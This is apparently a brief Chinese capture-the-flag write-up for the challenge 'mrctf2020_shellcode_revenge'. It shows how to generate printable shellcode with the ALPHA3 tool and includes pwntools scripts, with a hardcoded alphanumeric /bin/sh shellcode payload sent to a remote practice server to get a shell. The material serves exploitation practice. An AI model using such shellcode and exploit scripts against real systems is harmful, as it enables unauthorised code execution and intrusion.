mrctf2020_shellcode_revenge

这题记录一下使用工具ALPHA3生成可打印的shellcode

下载alpha3:

1
git clone https://github.com/TaQini/alpha3.git

写一个生成普通shellcode的脚本:

1
2
3
4
5
6
from pwn import *
context.arch="amd64"
f = open('sc.bin','wb')
f.write(asm(shellcraft.sh()))
f.close()

执行后,用alpha3.py生成可见字符shellcode

1
2
3
4
5
6
7
from pwn import *

p = process("./mrctf2020_shellcode_revenge")
payload = "your_shellcode"
p.sendafter('magic!',payload)
p.interactive()

exp:

1
2
3
4
5
6
7
8
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
#p = process("./mrctf2020_shellcode_revenge")
p = remote("node4.buuoj.cn",25535)
payload="Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t"
p.sendafter('magic!',payload)
p.interactive()